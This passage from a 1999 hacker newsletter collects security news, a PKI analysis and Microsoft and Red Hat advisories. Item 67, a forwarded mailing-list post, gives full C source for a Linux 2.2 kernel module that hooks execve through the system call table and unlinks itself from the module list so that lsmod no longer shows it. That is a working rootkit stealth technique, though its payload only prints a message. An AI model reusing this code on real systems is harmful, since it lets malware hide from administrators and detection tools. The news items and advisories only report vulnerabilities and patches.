using Virage video analysis software, and this is now going into live operation.
Twenty four hours a day, seven days a week, CNN's 1,500 editors receive 32
newsfeeds, which used to be recorded on to video tapes. Now the feeds are
recorded digitally, together with the associated script and news data, so
editors have access to them from their desktop.

Other US TV networks are already using video analysis systems (CBS with
IBM's DB2 Digital Library, and NBC with Islip's MediaSite). European
broadcasters including the BBC and Carlton in the UK and Spain's Telecinco
and Network España have expressed interest or are running pilot schemes.
Beyond news analysis, other TV uses of the software are digitising and
indexing archives, adapting news for the web, and tracking newscasts of rival
TV networks (being piloted in the US by Fox News and TimeWarner).

Mark Juliano, Islip's chief executive, says internet-based searchable television
is now a technical reality, with real-time searchable TV around the corner.
"This would allow any wired home or business user to search for topics of
interest on all channels currently broadcasting, as well as in stored
programming," he says.

Outside the TV industry, investment banks such as Goldman Sachs, Merrill
Lynch and Morgan Stanley are testing the software for monitoring any mention
of specific companies on financial news networks. The Harvard Business
School has digitised its study material, which students can search using
video analysis. General Motors is using the software to simplify searching
through several hundred hours of digitised focus group sessions.

The internet has fundamentally changed the model of searchable video,
according to John Zappa, Islip's vice-president of marketing. "Previously, video
cataloging, search and retrieval tools were aimed at a select group of media
companies," says Mr Zappa. "Now, any company can easily put their video
content on the internet."

The introduction of video analysis and indexing technology can certainly bring
benefits for business and consumer. But new technologies can have their
drawbacks too. The snooping scenario envisaged by Enemy of the State may
simply be a little late in its arrival.




Software that's got it taped

Virage's VideoLogger software is able to index video automatically and
simultaneously, to digitise multiple video formats, and output information to
any video application or database.

The latest version supports plug-in video analysis engines for real-time facial
and optical character recognition.

VideoLogger works with the company's AudioLogger real-time speech
recognition and speaker identification software. US-based Virage recently
demonstrated a consumer version of VideoLogger, which the company claims
will unlock the content of streaming video files on the internet.

International Business Machines has developed a News Archive system using
its DB2 Digital Library database technology. The Digital Library is used by
some of the world's largest media collections, such as the US Library of
Congress, the Vatican Library in Rome, the State Hermitage Museum in St
Petersburg, Russia, and the National Palace Museum in Taiwan.

The News Archive system lets users search video clips via precoded
parameters, such as clip date, subject name, producer, and location, or carry
out free-text searches of text notes and scripts. IBM's "query by image
content" allows a search for clips according to their shape and colour.

A spin-off from Carnegie-Mellon University in Pittsburgh, Pennsylvania, Islip
(Integrated Speech, Language, and Image Processed) Media has licensed the
technology base and software of the university's Informedia Digital Library
project. Islip's MediaSite system consists of several modules, including
creation and search tools.

Islip's MediaSite.net web site is a clearing-house for stock footage, news and
information, training and education video content, which users can search and
pay for via the web. Virage has recently launched a similar service, Virage
Interactive, as a hosted index of searchable video.

Excalibur Technologies' text searching software is used by many
organisations, including the two leading political parties in the UK.

The company, also US-based, has recently introduced its Excalibur
Screening Room video analysis system, and has teamed up with StorageTek,
the disc storage company, to provide large digital video repositories.

@HWA

60.0 Microsoft acknowledges software glitch that exposes e-mail passwords
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From: William Knowles <erehwon@kizmiaz.dis.org>



Microsoft acknowledges software glitch that exposes e-mail passwords


WASHINGTON (August 19, 1999 10:00 p.m. EDT http://www.nandotimes.com)
Microsoft Corp. said Thursday a bug in its new Internet chat software that
permits coworkers and others to see a person's e-mail password. It
promised to fix it by week's end.


The glitch in the company's new "MSN Messenger" software means that others
who have access to a person's computer could impersonate that person to
read and even send e-mail using his "Hotmail" account without anyone's
knowledge.


Microsoft said that even if customers delete their saved password and
enter it manually, it still becomes visible if another person types a
specific sequence of keystrokes on that computer.


Microsoft, whose software runs most of the world's personal computers,
promised to fix the problem by the end of Friday. The company said it was
made aware of the bug earlier this week.


Deanna Sanford, the product manager for MSN, said the bug's ill effects
were mitigated because a person must have physical access to the victim's
computer, meaning the problem will be worse in offices where coworkers
share machines than for home users.


"In a shared office environment, if you trust the people you work with,
this will probably never be an issue," Sanford said. But she said
Microsoft recommends protecting each computer with a password.


The problem was the latest embarrassment for Microsoft over its attempt to
capture part of the burgeoning market for Internet chat software,
currently dominated by America Online Inc.'s "Instant Messenger" software.


When Microsoft unveiled its chat software earlier this month, AOL
complained that Microsoft engineers had hacked into its proprietary
network to let MSN customers communicate with AOL's customers.


AOL successfully blocked Microsoft's software several times, but with each
attempt Microsoft redesigned its chat software to bypass AOL's blocking
attempts.


MSN Messenger customers currently can chat with people using AOL's
software, and Microsoft - in a bid for the moral high ground - announced
earlier this week it will release its software protocols so that other
companies can design software that interoperates with MSN.


The latest Microsoft bug occurs when customers use the software to check
their e-mail using Microsoft's popular Web-based "Hotmail" service. If a
person stops the resulting Internet page from loading and looks at the
underlying software code - which requires merely three clicks with the
mouse - the user's e-mail name and password are displayed in plain view.


Sanford said Microsoft will scramble the information in the upcoming
patched version using encryption technology.


ISN is sponsored by Security-Focus.COM

@HWA

61.0 U.S to seek new computer surveillance power
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From: William Knowles <erehwon@kizmiaz.dis.org>



U.S. To Seek Neew Computer Surveillance Power


http://dailynews.yahoo.com/h/nm/19990820/ts/technology_covert_2.html


WASHINGTON (Reuters) [8.20.99] - The Justice Department is seeking new
powers to break into private premises and disable security precautions on
personal computers as a prelude to a wiretap or further search, the
Washington Post reported Friday.


The department wanted to make it easier for law enforcement authorities to
get search warrants that would let them monitor suspects' computerized
records after break-ins, said the paper, citing documents and interviews
with Clinton administration officials.


``In a request set to go to Capitol Hill, Justice officials will ask
lawmakers to authorize covert action in response to the growing use of
software programs that encrypt, or scramble, computer files,'' the report
said. Such encryption makes computers inaccessible to anyone who lacks a
special code or ''key.''


Justice officials worry that such software ``is increasingly used as a
means to facilitate criminal activity, such as drug trafficking,
terrorism, white-collar crime and the distribution of child pornography,''
the Post quoted an Aug. 4 memo by the department as saying.


Under the proposed ``Cyberspace Electronic Security Act,'' investigators
armed with a sealed warrant could comb computers for passwords and install
devices that override encryption programs, the Post reported, citing the
Justice memo.


To pull information from a targeted computer, agents would still be
required to get additional authorization from a court, the paper said.


Justice officials were not immediately available for comment. The proposal
is the latest in a years-long tug-of-war between the government and
computer users who want to protect their privacy by encrypting documents.


[snip..]


ISN is sponsored by Security-Focus.COM

@HWA

62.0 Code cracker worries cryptographers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



http://www.newspage.com/cgi-bin/NA.GetStory?story=h0812161.902\&date=19990813\&level1=46510\&level2=46515\&level3=821


Code Cracker Worries Cryptographers


August 13, 1999


WORCESTER, MASS. - The Associated Press via NewsEdge Corporation : A
developer of one of the most widespread computer encryption systems said
Thursday he has designed a computer that could crack open a file encoded
using the most common form of data encryption in only a few days.


If built _ at an estimated cost of about $2 million _ such a computer
could jeopardize the privacy of the bulk of electronic commerce as
practiced today, according to cryptographers at the conference where the
design was shown.


Most highly sensitive military, banking and other data are protected by
stronger encryption keys beyond its reach. The commonly used weaker keys,
though, would become ``easy to break for large organizations,'' said
cryptographer Adi Shamir of the Weizmann Institute of Science in Rehovot,
Israel.


He developed both the new computer design and helped invent the widespread
coding system _ known as RSA public-key encryption _ that it attacks.


Shamir spoke at the opening of a two-day conference of more than 120
cryptography experts from around the world at Worcester Polytechnic
Institute.


Computer scientists said his work underscores the growing vulnerability of
the most commonly used short form of RSA keys, which consists of just 512
bits. The key _ a sequence of 1s and 0s, or bits _ unlocks the secret
coding of a computer transmission so it can be deciphered.


Shamir dubs his idea for the computer Twinkle, which stands for The
Weizmann Institute Key Locating Engine and also refers to the twinkle of
its light emitting diodes. The 6-by-6-inch optical computer would measure
the light from diodes to perform mathematical calculations solving 512-bit
RSA encryption keys faster than ever _ within two or three days. An effort
in February to solve shorter, easier 465-bit keys took hundreds of
computers and several months.


[snip..]


ISN is sponsored by Security-Focus.COM

@HWA

63.0 AntiOnline offers infosec website hosting
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Straight from a message from Antionlines mailing list;

AntiOnline is proud to announce its new "InfoSec Community". This community allows individuals with an interest in information security and technology to share their thoughts, information, and files with
others who have similar interests.


Here are some of the benefits of becoming and AntiOnline InfoSec Community Member:


* Start out with 5 free megs, Get free upgrades up to 100 megs as your site grows.
* Your address will be: http://www.AntiOnline.com/members/YOUR-NAME
* Your site will be indexed by AntiSearch which draws thousands of people a day who are looking for information related to information security.
* You can upload files you create on your computer directly to your site via a simple upload form.
* Simple web-based editors help you create a page even if you're not an HTML wiz.
* Each week AntiOnline will spotlight a community site on its main page. If chosen, this guarantees that your work will be seen by thousands of people in the information security industry!
* A great place to distribute documents and programs that you've written! Also a great place to stick a resume!
* Once your webpage is in place and attracting visitors, you can request a message board or guestbook to be hosted by AntiOnline.com for you, free of charge!


Visit The Following URL To Sign Up For Your Own Account!



http://www.AntiOnline.com/members/cgi-bin/new.cgi




------------------------------------------------------------------------------------
Get Your Free AntiOnline E-mail Account: http://www.AntiOnline.com/mail/
Keep An EYE On The Underground: http://www.AntiOnline.com/eye/
Learn To FIGHT-BACK against malicious hackers: http://www.AntiOnline.com/fight-back/
Search Security Sites: http://www.AntiSearch.com/
Exploits Sorted By OS: http://www.AntiCode.com/
------------------------------------------------------------------------------------

@HWA

64.0 PKI yesterday today and tomorrow
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PKI: Yesterday, Today, Tomorrow


A Hurwitz Group Exclusive Analysis

By Diana Kelley
August 23, 1999 - For the past three years or so the rallying cry from the
major PKI vendors has been, "This is the year of PKI!" While it's true that PKI has
made some significant inroads into organizations, most notably ScotiaBank in
Canada and the ANX PKI created by the US automobile industry, we are still some
distance from the "Year of PKI." In practice many companies have spent time and
effort prototyping PK-Islands, independent disconnected solutions that fail to
support true business to business applications. Frustrated by investments in time
and money with little visible return many organizations have temporarily halted PKI
work. What's caused this slowdown in adoption and is there a change in the
landscape that signals a new phase for PKI?

What is it?


PKI. It's a great buzzword, but what is it exactly? A large part of the confusion in the industry can be directly
correlated to a muddied perception of what PKI is and what it can do for business. PKI is shorthand for Public Key
Infrastucture. It is based on the concept of public key cryptography which uses a key pair, a public key and a private
key, to perform various cryptographic functions.
Public key cryptography differs from the more traditional symmetric key which uses the same keys for encryption and
decryption. Symmetric key cryptography is fast and efficient but has a major drawback, it requires that the parties find
a way to share the single key secretly in advance of the communication session. In a closed environment this is not a
difficult accomplishment, but when two parties are meeting for the first time in a public digital environment such as the
Internet it is almost impossible to arrange a convenient manner to exchange a secret key. By splitting up the
cryptographic functions between a public and a private key, public key cryptography enables parties that have never
met before to communicate in an encrypted manner.

How the Keys are Used

Security services provided by public keys include authentication and non-repudiation though the use of digital
signatures, and confidentiality of communication in transit. The public and private keys are linked mathematically but
one should not be capable of being derived from the other. If the private key could be derived from the public key it
would break the security of the system. In practice, the public key is available to the public, it can be sent on request
by the owner or stored in a central server. The private key should be kept secret by the owner, either on the holder's
hard drive or a device such as a smartcard.

Encrypted Communications

Public key cryptography can be used to encrypt a communication before sending it over untrusted networks, such as
the Internet. The sender encrypts the message using the recipient's public key. Depending on the distribution method
the sender could request the public key directly from the intended recipient, or look up the public key in an available
key repository. Upon receipt the recipient uses her private key to decrypt the data. Data that has been encrypted
using a public key can only be decrypted using the related private key. This technique can be extended to data that is
resides on hard drives as well to provide secure storage.

Digital Signatures

The other most common use of public key cryptogrpahy is to provide authentication and nonrepudiation using digital
signatures. A signature is created by creating a hash of the data and then encrypting this with the sender's private
key. The recipient performs the same hash function on the data to create a value. Using the sender's public key, the
recipient decrypts the digital signature to discover the sender's hash value of the message. If the two values match,
the recipient knows conclusively that the message has not been tampered with and that it was sent by someone in
possession of the sender's private key.

Components of PKI

The PKI itself is the set of protocols and systems used to manage and distribute the keys and certificates. There is no
single definition of what constitutes a PKI, although many organizations including the IETF (Internet Engineerng Task
Force), The Open Group, and NIST (National Institute of Standards and Technology) are working on various PKI related
standards. In general, most PKIs include a standard set of components as listed below.
Registration Authority (RA) - The trusted entity that certifies the identity of the user
Certification Authority (CA) - The trusted entity that issues public key certificates
Certificate Repository - The server or system where public key certificates are held
Certificates - The records that contain structured information about the owner including the owner's name, public key
and the name of the issuing authority. The current standard for public key certifcates is X.509v3.
Certificate Revocation Lists (CRLs) - The listing of revoked or suspended public key certificates.

What Happened?


After looking at public key cryptography a lot of companies thought, "Wow, this is really neat technology!" And they
were right. But even the most sophisticated technology in the world is of no use unless it can be applied directly to
the solution of a business/consumer problem. In the mad frenzy to become an Internet enabled e-Business many
companies rushed towards implementation of PKI without first taking the time to define their business requirements.
Without a clear business goal to build toward even the best technology in the world will fail to be successful.

Business Need vs. Media Hype

What, then are the business needs? Any organization that is planning to transform to an e-Business needs to answer
the following questions:
What is the business problem?
What are the available technologies to solve the problem?
What fits in best with our environment?
Specific requirements vary depending on the line of business, unique needs of the business units, and market-based
needs driven by industry. Within this spectrum, there are some basic e-Business needs that cut across most industries.
These include:
Availability to the global market for 24x7x365 selling and support
Rapid deployment to keep pace with the competition
Enhanced customer experience achieved using personalization technologies
Increased control over the supply chain to reduce inventory turn time
Privacy of communications
Non-repudiability of transactions
That's quite a long list and no single technology can provide answers to each one. Smart e-Businesses must select the
most appropriate technologies to solve each problem. In the case of PKI, it is extemely well suited to provide solutions
for the last two bullets, but does not directly provide an answer to the other e-Business issues.

Reality Sets In

When the media hype surrounding PKI broke hit the marketplace a few years ago there was a lot of misrepresentation
and promise surrounding what PKI could actually do. The combination of a mixed media message and a lack of defined
goals within business is one of the main reasons that many companies were disappointed with their early
implementations of PKI technology.
Creating a distributed, scalable PKI is not an easy task. This complexity has given rise to a number of factors that
have contributed to failed or stalled PKI implementations.

Lack of Interoperability

If companies don't want to find themselves stranded on their own PK-Island they need to plan to integrate with other
installations. This is easier said than done. X.509 certificates are not always interoperable and many of the PKI vendors
can not provide cross-certification and certificate validation cross-vendor.

Cost

A lack of standards exists in pricing schemes as well. Some vendors charge per certificate, others per number of users,
and others still by number of servers. The result is a confusing tangle, when it is finally sorted out most companies find
that the cost of the PKI will be much higher than originally expected.

Legacy Applications that aren't PK-enabled

Public key technology is great but it needs to be linked directly into an application to add business value. Legacy
systems and ERP applications are not enabled for PKI. Packaged application vendors are beginning to build in support
for PKI, but until now the only way to integrate certificates into the back office has been through an investment in
developer time and resources.

Scalability Issues

Because PKI is in its infancy there have not been a number of large distributed installations. Scalability of the CRLs
(Certificate Revocation Lists) is a concern for organizations that will deal with large numbers of revoked certificates.
Scalability and performance concerns include excessive time delays, high processing loads and need for additional
bandwidth.

Not Customer Centric

Private keys are pieces of code that need to be stored someplace. One of the biggest benefits to e-Business is the
ease of access and mobility. Using any available web browser people can check stock prices, read and write email, and
bank on-line from a variety of locations and systems. If a certificate is required for access then user mobility is limited
to the system where the certificate is stored. Smartcards are a possible solution to this dilemma but they are still too
limiting; the free Internet terminal at the airport doesn't have a smartcard reader, does it?

What Next?

If PKI implementations have been so difficult to deploy successfully up to now, what has changed that makes it right
for today's e-Business. One need look no further than ScotiaBank and the ANX PKI for answes. Both of these
implementations were well thought out implementations of PKI to solve a specific business problem. The abilities to
encrypt transactions between parties and provide non-repudiation services to consumers are cornerstones of
e-Business.
Already there have been some very successful uses for PKI in VPN implementations and for email. In the future as the
transformation to the e-Business paradigm progresses, the boundaries between internal and external networks will
disappear. In this newly open and interconnected world PKI has the opportunity to provide targeted business solutions
in a number of areas. As communications between applications and devices increase, look for and increase in
certificates that are issued to devices such as routers and firewalls to manage secure communications. Using the time
stamping feature contained in some PKIs, organizations can protect auditing and logging data and store it encrypted.
For high security sites, content could be protected on a page by page basis. And with the ascendence of Directory
Services in the enterprise organizations are discovering a central repository with a shared query language (LDAP) that
can be used to store and distribute certificates.
PKI has an imporant place in the future of e-Business. The trick is for companies to establish the business problem that
needs to be solved first and then match the PKI solution appropriately. When companies address a business need with
the right technology everybody wins.
Diana Kelley (dkelley@hurwitz.com) is a Senior Security Analyst at Hurwitz Group, Inc., (www.hurwitz.com) the
leading analyst and advisory firm focused on strategic e-Business applications. Hurwitz Group partners with clients to
enable their success in applying electronic business strategies for maximum growth and competitive advantage.

Related Links

General Sites
American Bar Association - Digital Signature Guidelines
The Ten Minute CEO Briefing on PKI, Digital Certificates, and Trust in Electronic Transactions - 5 Questions every
CEO should be able to answer
International Chamber of Commerce: General Usage for International Digitally Ensured Commerce
Government Sites
NIST PKI Technical Working Group
Federal PKI Steering Committee
Government of Canada's PKI
PKI Vendors & Standards

@HWA


65.0 Microsoft Advisory, double byte code page vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following is a Security Bulletin from the Microsoft Product Security
Notification Service.


Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************


Re-release of Patch for "Double Byte Code Page" Vulnerability
-------------------------------------------------------------


August 20, 1999


Issue
=====
Microsoft has identifed and corrected a regression error in the IIS 4.0
version of the previously-released patch for the "Double Byte Code Page"
vulnerability. The corrected patch has been re-released, and an updated
security bulletin is available at
http://www.microsoft.com/security/bulletins/ms99-022.asp.


Details
=======
Shortly after releasing the patch for the "Malformed HTTP Request Header"
vulnerability (http://www.microsoft.com/Security/Bulletins/ms99-029.asp),
Microsoft discovered a regression error in it. We investigated all
previously-released patches to determine whether any others were affected by
the error, and discovered that one other patch was affected -- the IIS 4.0
version of the patch for the "Double Byte Code Page" vulnerability. On
August 16, 1999, we re-released the patch for the "Malformed HTTP Request
Header" vulnerability, and today are re-releasing the patch for the "Double
Byte Code Page" vulnerability. We have verified that no other security
patches are affected by this vulnerability, and have corrected our code base
to eliminate the error from all future IIS 4.0 releases.


The regression error is completely unrelated to the vulnerabilities, and
does not change our diagnosis of either. The error occurs if the IIS log
file grows to a size that is an exact multiple of 64KB; if this happens, the
server will hang. The problem can be resolved by stopping the IIS service,
starting a new log file, and restarting the IIS service. The regression
error affected only IIS 4.0, and was introduced after Windows NT 4.0 Service
Pack 5.


How to Identify the Re-released Patches
=======================================
- The re-released patches for the "Double Byte Code Page" are
timestamped August 17, 1999. (Please note that the IIS 3.0 patches
were unaffected by the regression error, so they are still
timestamped June 24, 1999).
- The re-released patches for the "Malformed HTTP Request Header"
are timestamped August 12, 1999.


What Customers Should Do
========================
You do not need to take any action if ANY of the following apply to you:
- You are running IIS 3.0.
- You have not installed any IIS 4.0 patches released after
Windows NT 4.0 Service Pack 5.
- You have installed the re-released patch for the "Malformed HTTP
Request Header" vulnerability.


You need to take action if ALL of the following apply to you:
- You applied the original version of either the "Double Byte Code Page"
patch or the "Malformed HTTP Request Header" patch.
- You have not applied the re-released version of either patch.


If you need to take action, you should apply the re-released patches for
either the "Maformed HTTP Request Header" or "Double Byte Code Page"
vulnerabilities. Applying either of the patches will correct the error.
It's not necessary to "back out" either of the original patches; just
download the new version of either patch and install it.


Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Technical Support is available at
http://support.microsoft.com/support/contact/default.asp.



---------------------------------------------------------------


THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN
IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.


(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.


*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.


For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/services/bulletin.asp. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.

@HWA

66.0 RHSA:Denial of service attack in in.telnetd
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---------------------------------------------------------------------
Red Hat, Inc. Security Advisory


Synopsis: Denial of service attack in in.telnetd
Advisory ID: RHSA-1999:029-01
Issue date: 1999-08-19
Updated on:
Keywords: telnet telnetd
Cross references:
---------------------------------------------------------------------


1. Topic:


A denial of service attack has been fixed in in.telnetd.


2. Bug IDs fixed (http://developer.redhat.com/bugzilla/):


4560


3. Relevant releases/architectures:


Red Hat Linux 4.2, 5.2, 6.0, all architectures


4. Obsoleted by:


5. Conflicts with:


6. RPMs required:


Red Hat Linux 4.2:


Intel:
ftp://ftp.redhat.com/redhat/updates/4.2/i386/NetKit-B-0.09-11.i386.rpm


Alpha:
ftp://ftp.redhat.com/redhat/updates/4.2/alpha/NetKit-B-0.09-11.alpha.rpm


Sparc:
ftp://ftp.redhat.com/redhat/updates/4.2/sparc/NetKit-B-0.09-11.sparc.rpm


Source packages:
ftp

  
://ftp.redhat.com/redhat/updates/4.2/SRPMS/NetKit-B-0.09-11.src.rpm


Red Hat Linux 5.2:


Intel:
ftp://ftp.redhat.com/redhat/updates/5.2/i386/telnet-0.10-28.5.2.i386.rpm


Alpha:
ftp://ftp.redhat.com/redhat/updates/5.2/alpha/telnet-0.10-28.5.2.alpha.rpm


Sparc:
ftp://ftp.redhat.com/redhat/updates/5.2/sparc/telnet-0.10-28.5.2.sparc.rpm


Source packages:
ftp://ftp.redhat.com/redhat/updates/5.2/SRPMS/telnet-0.10-28.5.2.src.rpm


Red Hat Linux 6.0:


Intel:
ftp://ftp.redhat.com/redhat/updates/6.0/i386/telnet-0.10-29.i386.rpm


Alpha:
ftp://ftp.redhat.com/redhat/updates/6.0/alpha/telnet-0.10-29.alpha.rpm


Sparc:
ftp://ftp.redhat.com/redhat/updates/6.0/sparc/telnet-0.10-29.sparc.rpm


Source packages:
ftp://ftp.redhat.com/redhat/updates/6.0/SRPMS/telnet-0.10-29.src.rpm


7. Problem description:


in.telnetd attempts to negotiate a compatible terminal type
between the local and remote host. By setting the TERM
environment variable before connecting, a remote user could
cause the system telnetd to open files it should not. Depending
on the TERM setting used, this could lead to denial of service
attacks.


Thanks go to Michal Zalewski and the Linux Security Audit team
for noting this vulnerability.


8. Solution:


For each RPM for your particular architecture, run:


rpm -Uvh <filename>


where filename is the name of the RPM.


9. Verification:


MD5 sum Package Name
--------------------------------------------------------------------------
0c425c34fb77a8309ff10b4143e9b847 i386/NetKit-B-0.09-11.i386.rpm
d791d645adeb5fa0147c1058b21cbbac alpha/NetKit-B-0.09-11.alpha.rpm
bfbd440845191bbdcf8be21ee59bf6a8 sparc/NetKit-B-0.09-11.sparc.rpm
ccd5ab53c423e468d66ca801c90b5ae4 SRPMS/NetKit-B-0.09-11.src.rpm


ef33f3c5ca810d05420e57b5cfcf8928 i386/telnet-0.10-28.5.2.i386.rpm
6dc23437a200193b0bfed23d5f5e6562 alpha/telnet-0.10-28.5.2.alpha.rpm
49c38457cc0a82a680fd9b9634dc8021 sparc/telnet-0.10-28.5.2.sparc.rpm
2f33670a683e3abef0e4914586c71961 SRPMS/telnet-0.10-28.5.2.src.rpm


4360d47490f13d60b8737d28dc88825a i386/telnet-0.10-29.i386.rpm
90213fcdca41a3ed12ab7d92344e7286 alpha/telnet-0.10-29.alpha.rpm
277787dbc39dff8ea84d4b16dcb7a954 sparc/telnet-0.10-29.sparc.rpm
269783a0754d234f7bef0f4717a8dbc2 SRPMS/telnet-0.10-29.src.rpm


These packages are PGP signed by Red Hat Inc. for security. Our key
is available at:


http://www.redhat.com/corp/contact.html


You can verify each package with the following command:


rpm --checksig <filename>


If you only wish to verify that each package has not been corrupted or
tampered with, examine only the md5sum with the following command:


rpm --checksig --nopgp <filename>


10. References:

@HWA

67.0 [EuroHaCk] stealth-code
~~~~~~~~~~~~~~~~~~~~~~~



---------- Forwarded message ----------
Date: Wed, 18 Aug 1999 18:56:09 +0200
From: Martin Markovitz <stealth@dione.ids.pl>
Reply-To: eurohack@bofh.kyrnet.kg
To: coders@dione.ids.pl
Subject: [EuroHaCk] stealth-code




hi,


don't think that hiding modules is an old topic. ;-)
since all the other dirty tricks didn't work on 2.2
kernel (as using asm-code etc.) i used new
techniqe to hide modules. example-code below.
payload is simly print-out-message-at-execution-call
thingie.
this module even is stealth enuff ;-) for my radar.c
module-detector.
any other suggestions are welcome.


cheers,
Stealth




: ---- main(){fork();main();} ----
: Hi! I'm a .signature virus! Copy me into your ~/.signature, please!
: Stealth <-> http://www.kalug.lug.net/stealth


/*** A kernel-module for 2.2 kernels, hiding itself.
*** It was easier in 2.0 kernels and i found all the old
*** techniqes not to work. So i invented new one. ;-)
*** (C) 1999/2000 by Stealth.
*** All under the GPL. SO YOU USE IT AT YOUR OWN RISK.
*** http://www.kalug.lug.net/stealth
***
*** Greets to all my friends, you know who you are.
***/
#define __KERNEL__
#define MODULE
#include <linux/module.h>
#include <linux/kernel.h>
#include <sys/syscall.h>
#include <linux/unistd.h>
#include <linux/sched.h>
#include <asm/uaccess.h>
#include <linux/mm.h>
#include <linux/smp_lock.h>
#ifndef NULL
#define NULL ((void*)0)
#endif


extern void *sys_call_table[];
int (*old_exec)(struct pt_regs regs);


int new_exec(struct pt_regs regs)
{
int error = 0;
char *filename;


lock_kernel();
filename = getname((char*)regs.ebx);
error = PTR_ERR(filename);
if (IS_ERR(error))
goto out;


printk("Hi, the hook is still installed. ;-)\n");
error = do_execve(filename, (char**)regs.ecx, (char**)regs.edx, ®s);
putname(filename);
out:
unlock_kernel();
return error;
}



int init_module()
{
int i = 0;
struct module *m = &__this_module, *lastm = NULL,
*to_delete = NULL;

EXPORT_NO_SYMBOLS;


/* install hook */
old_exec = sys_call_table[__NR_execve];
sys_call_table[__NR_execve] = new_exec;


/* get next module-struct */
to_delete = m->next;
if (!to_delete) {
printk("No module found for exchange }|-(\n");
return 0;
}


/* and steal all information about it */
m->name = to_delete->name;
m->size = to_delete->size;
m->flags = to_delete->flags;

/* even set the right USE_COUNT */
for (i = 0; i < GET_USE_COUNT(to_delete); i++)
MOD_INC_USE_COUNT;

/* and drop the attacked module from the list
* this won't delete it but makes it disapear for lsmod
*/
m->next = to_delete->next;


printk("The following modules are visible now:\n");
while (m) {
printk("%s\n", m->name);
m = m->next;
}
printk("Tzzz... (sleeping)\n");
return 0;
}


int cleanup_module()
{
sys_call_table[__NR_execve] = old_exec;
return 0;
}

@HWA

68.0 RHSA;Buffer overflow in libtermcap tgetent()
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



---------------------------------------------------------------------
Red Hat, Inc. Security Advisory


Synopsis: Buffer overflow in libtermcap tgetent()
Advisory ID: RHSA-1999:028-01
Issue date: 1999-08-17
Updated on:
Keywords: termcap xterm
Cross references:
---------------------------------------------------------------------


1. Topic:


A buffer overflow has been fixed in the tgetent() function of
libtermcap.


2. Bug IDs fixed (http://developer.redhat.com/bugzilla/):


4538


3. Relevant releases/architectures:


Red Hat Linux 4.2, 5.2, 6.0, all architectures


4. Obsoleted by:


5. Conflicts with:


6. RPMs required:


Red Hat Linux 4.2:


Intel:
ftp://ftp.redhat.com/redhat/updates/4.2/i386/libtermcap-2.0.8-14.4.2.i386.rpm
ftp://ftp.redhat.com/redhat/updates/4.2/i386/libtermcap-devel-2.0.8-14.4.2.i386.rpm


Alpha:
ftp://ftp.redhat.com/redhat/updates/4.2/alpha/libtermcap-2.0.8-14.4.2.alpha.rpm
ftp://ftp.redhat.com/redhat/updates/4.2/alpha/libtermcap-devel-2.0.8-14.4.2.alpha.rpm


Sparc:
ftp://ftp.redhat.com/redhat/updates/4.2/sparc/libtermcap-2.0.8-14.4.2.sparc.rpm
ftp://ftp.redhat.com/redhat/updates/4.2/sparc/libtermcap-devel-2.0.8-14.4.2.sparc.rpm


Source packages:
ftp://ftp.redhat.com/redhat/updates/4.2/SRPMS/libtermcap-2.0.8-14.4.2.src.rpm


Red Hat Linux 5.2:


Intel:
ftp://ftp.redhat.com/redhat/updates/5.2/i386/libtermcap-2.0.8-14.5.2.i386.rpm
ftp://ftp.redhat.com/redhat/updates/5.2/i386/libtermcap-devel-2.0.8-14.5.2.i386.rpm


Alpha:
ftp://ftp.redhat.com/redhat/updates/5.2/alpha/libtermcap-2.0.8-14.5.2.alpha.rpm
ftp://ftp.redhat.com/redhat/updates/5.2/alpha/libtermcap-devel-2.0.8-14.5.2.alpha.rpm


Sparc:
ftp://ftp.redhat.com/redhat/updates/5.2/sparc/libtermcap-2.0.8-14.5.2.sparc.rpm
ftp://ftp.redhat.com/redhat/updates/5.2/sparc/libtermcap-devel-2.0.8-14.5.2.sparc.rpm


Source packages:
ftp://ftp.redhat.com/redhat/updates/5.2/SRPMS/libtermcap-2.0.8-14.5.2.src.rpm


Red Hat Linux 6.0:


Intel:
ftp://ftp.redhat.com/redhat/updates/6.0/i386/libtermcap-2.0.8-15.i386.rpm
ftp://ftp.redhat.com/redhat/updates/6.0/i386/libtermcap-devel-2.0.8-15.i386.rpm


Alpha:
ftp://ftp.redhat.com/redhat/updates/6.0/alpha/libtermcap-2.0.8-15.alpha.rpm
ftp://ftp.redhat.com/redhat/updates/6.0/alpha/libtermcap-devel-2.0.8-15.alpha.rpm


Sparc:
